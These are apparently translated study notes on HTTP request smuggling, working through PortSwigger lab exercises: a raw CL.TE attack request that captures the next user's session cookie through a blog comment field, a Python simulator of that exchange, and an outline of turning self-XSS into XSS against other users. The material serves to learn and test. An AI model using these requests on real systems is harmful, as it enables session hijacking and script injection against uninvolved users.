HTTP request smuggling study notes (1): introduction to HTTP request smuggling
HTTP request smuggling study notes (2): common HTTP request smuggling techniques
HTTP request smuggling study notes (3): exploiting HTTP request smuggling
Lab address: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Taking the CL.TE case as the example, a short demonstration of exploitation.
Stealing another user's request via the comment field
Post any comment, capture the request, and modify it as below. The front-end frames the request by Content-Length, so it forwards the whole body; the back-end frames it by Transfer-Encoding, so it stops at the "0" chunk and leaves everything after it on the connection as the start of the next request:

POST / HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Connection: close
Content-Length: 886
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Connection: close
Content-Length: 1020
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG

csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=&comment=

The outer Content-Length (886 here) must cover the entire body including the smuggled request (Burp's "Update Content-Length" does this), and the smuggled body must end exactly at "comment=" with no trailing newline.
The Content-Length of the smuggled request (1020 here) has to be tuned case by case: it must be large enough that the back-end reads past the next user's Cookie header, but no larger than the smuggled body plus that user's whole request, otherwise the back-end keeps waiting for bytes that never arrive and the request times out. Start small and increase it until the cookie shows up.
Submit the request: everything after the "0" chunk is smuggled onto the front of the next request that the back-end reads from that connection.
On the back-end, the next request is therefore assembled as:

POST /post/comment HTTP/1.1
Host: ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net
.....
csrf=9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk&postId=4&name=11111&email=test%40163.com&website=&comment=POST /post/comment HTTP/1.1
xxxx

Since comment is the comment body, the next request's content (as many bytes of it as the smuggled Content-Length asks for) ends up displayed as a comment.
Now send the request, go back to the comment form and submit anything.
The page may show an error first (the unread tail of the swallowed request is left on the connection and gets parsed as a malformed request); refresh.
The next user's request is now displayed in the comment, session cookie included.
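To make the framing difference concrete, here is a small simulator of the CL.TE exchange above. It is an added example, not code from the page or from PortSwigger: the front-end frames by Content-Length, the back-end by Transfer-Encoding, and the smuggled POST /post/comment swallows the next request's bytes into comment= until its own Content-Length is satisfied. The host, session and csrf values are the ones in the capture above; the "victim" request is constructed for the demo, and the two parsers are deliberately minimal (no chunk extensions or trailers beyond skipping them).

```python
"""CL.TE request smuggling, simulated end to end (added example, not the lab's code)."""
from urllib.parse import parse_qs

HOST = "ac651fdf1ff9308c80dd0e3400a10070.web-security-academy.net"  # from the page's capture
ATTACKER_SESSION = "ChTrMNa7wvzEl67A3hXnHGlHK9bhoVXG"                # from the page's capture
CSRF = "9TwQhCEYJGWu3I65LSTEZjdVRHBuOzdk"                            # from the page's capture

# Body of the smuggled POST /post/comment. It must end exactly at "comment=" so the
# next request's bytes become the comment value.
SMUGGLED_BODY_PREFIX = (
    f"csrf={CSRF}&postId=4&name=11111&email=test%40163.com&website=&comment="
).encode()

# Constructed stand-in for the next user's request (not a real capture). It contains
# no "&" or ";", which a form parser would otherwise treat as separators.
VICTIM_REQUEST = (
    "GET /post?postId=4 HTTP/1.1\r\n"
    f"Host: {HOST}\r\n"
    "Accept: text/html\r\n"
    "Cookie: session=VICTIMSESSIONCOOKIEVALUE\r\n"
    "Accept-Language: en\r\n"
    "\r\n"
).encode()


def build_attack(smuggled_cl: int) -> bytes:
    """Raw CL.TE attack request. smuggled_cl is the Content-Length claimed by the
    smuggled POST; it decides how many bytes of the next request get swallowed."""
    smuggled = (
        "POST /post/comment HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {smuggled_cl}\r\n"
        f"Cookie: session={ATTACKER_SESSION}\r\n"
        "\r\n"
    ).encode() + SMUGGLED_BODY_PREFIX
    body = b"0\r\n\r\n" + smuggled          # zero-size chunk ends the outer request for the back-end
    return (
        "POST / HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"  # front-end: whole body, smuggled part included
        "Transfer-Encoding: chunked\r\n"     # back-end: stops at the 0 chunk
        "\r\n"
    ).encode() + body


def _split_head(stream: bytes):
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, rest


def frontend_forward(stream: bytes) -> bytes:
    """Front-end: frames by Content-Length only, so it forwards the attack request whole."""
    _, headers, rest = _split_head(stream)
    n = int(headers.get("content-length", "0"))
    return stream[: len(stream) - len(rest) + n]


def _read_chunked(rest: bytes):
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            _, _, rest = rest.partition(b"\r\n")  # empty trailer section
            return body, rest
        body += rest[:size]
        rest = rest[size + 2:]                    # chunk data plus its CRLF


def backend_parse(stream: bytes):
    """Back-end: prefers Transfer-Encoding. Returns (completed requests, bytes still
    waiting on the connection). A request whose Content-Length exceeds the bytes on
    hand stays pending: that is what a too-large smuggled Content-Length looks like."""
    done = []
    while (parsed := _split_head(stream)) is not None:
        req_line, headers, rest = parsed
        if " HTTP/" not in req_line:
            break                                 # tail of a swallowed request: a 400 in practice
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body, stream = _read_chunked(rest)
        else:
            n = int(headers.get("content-length", "0"))
            if len(rest) < n:
                break                             # incomplete: keep waiting for more bytes
            body, stream = rest[:n], rest[n:]
        done.append((req_line, headers, body))
    return done, stream


def simulate(smuggled_cl: int, victim: bytes = VICTIM_REQUEST):
    """Send the attack, then the victim's request, through the simulated pair.
    Returns (comment value the back-end stores, or None if it is still waiting,
    leftover bytes on the connection)."""
    done, pending = backend_parse(frontend_forward(build_attack(smuggled_cl)))
    assert len(done) == 1 and pending.startswith(b"POST /post/comment")
    done, leftover = backend_parse(pending + victim)   # victim lands on the same connection
    if not done:
        return None, leftover
    _, _, body = done[0]
    params = parse_qs(body.decode("latin-1"), keep_blank_values=True)
    return params["comment"][0], leftover


def content_length_to_capture(victim: bytes, marker: bytes) -> int:
    """Smuggled Content-Length that swallows the victim's request through the end of
    the line containing marker (a real attacker finds this by trial; here we cheat)."""
    end = victim.index(b"\r\n", victim.index(marker)) + 2
    return len(SMUGGLED_BODY_PREFIX) + end


if __name__ == "__main__":
    cl = content_length_to_capture(VICTIM_REQUEST, b"Cookie:")
    comment, leftover = simulate(cl)
    print(f"Content-Length {cl} -> comment:\n{comment}\nleftover on connection: {leftover!r}")
    too_big = len(SMUGGLED_BODY_PREFIX) + len(VICTIM_REQUEST) + 1
    print(f"Content-Length {too_big} -> comment: {simulate(too_big)[0]} (back-end still waiting)")
```

Running it shows both failure modes the walkthrough warns about: with a Content-Length that reaches past the Cookie line the comment contains the victim's session, and the unread tail of the victim's request (here the Accept-Language line) stays on the connection to be misparsed as the next request; with a Content-Length larger than the smuggled body plus the whole victim request the back-end never completes the request at all.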
Lab address:
There is a hidden input that carries the User-Agent.
Try changing the User-Agent and inserting an XSS payload.
The JavaScript fires, but this is a classic self-XSS: you only attack yourself.
Use HTTP request smuggling to turn it into XSS against other users: put the payload in the User-Agent of the smuggled request, and its response is delivered to whoever's request comes next on the back-end connection.
After submitting, refresh the page a few times until the XSS fires.
Overall the exploitation is hard to aim: who gets hit is whoever happens to send the next request on that connection, which the attacker does not control.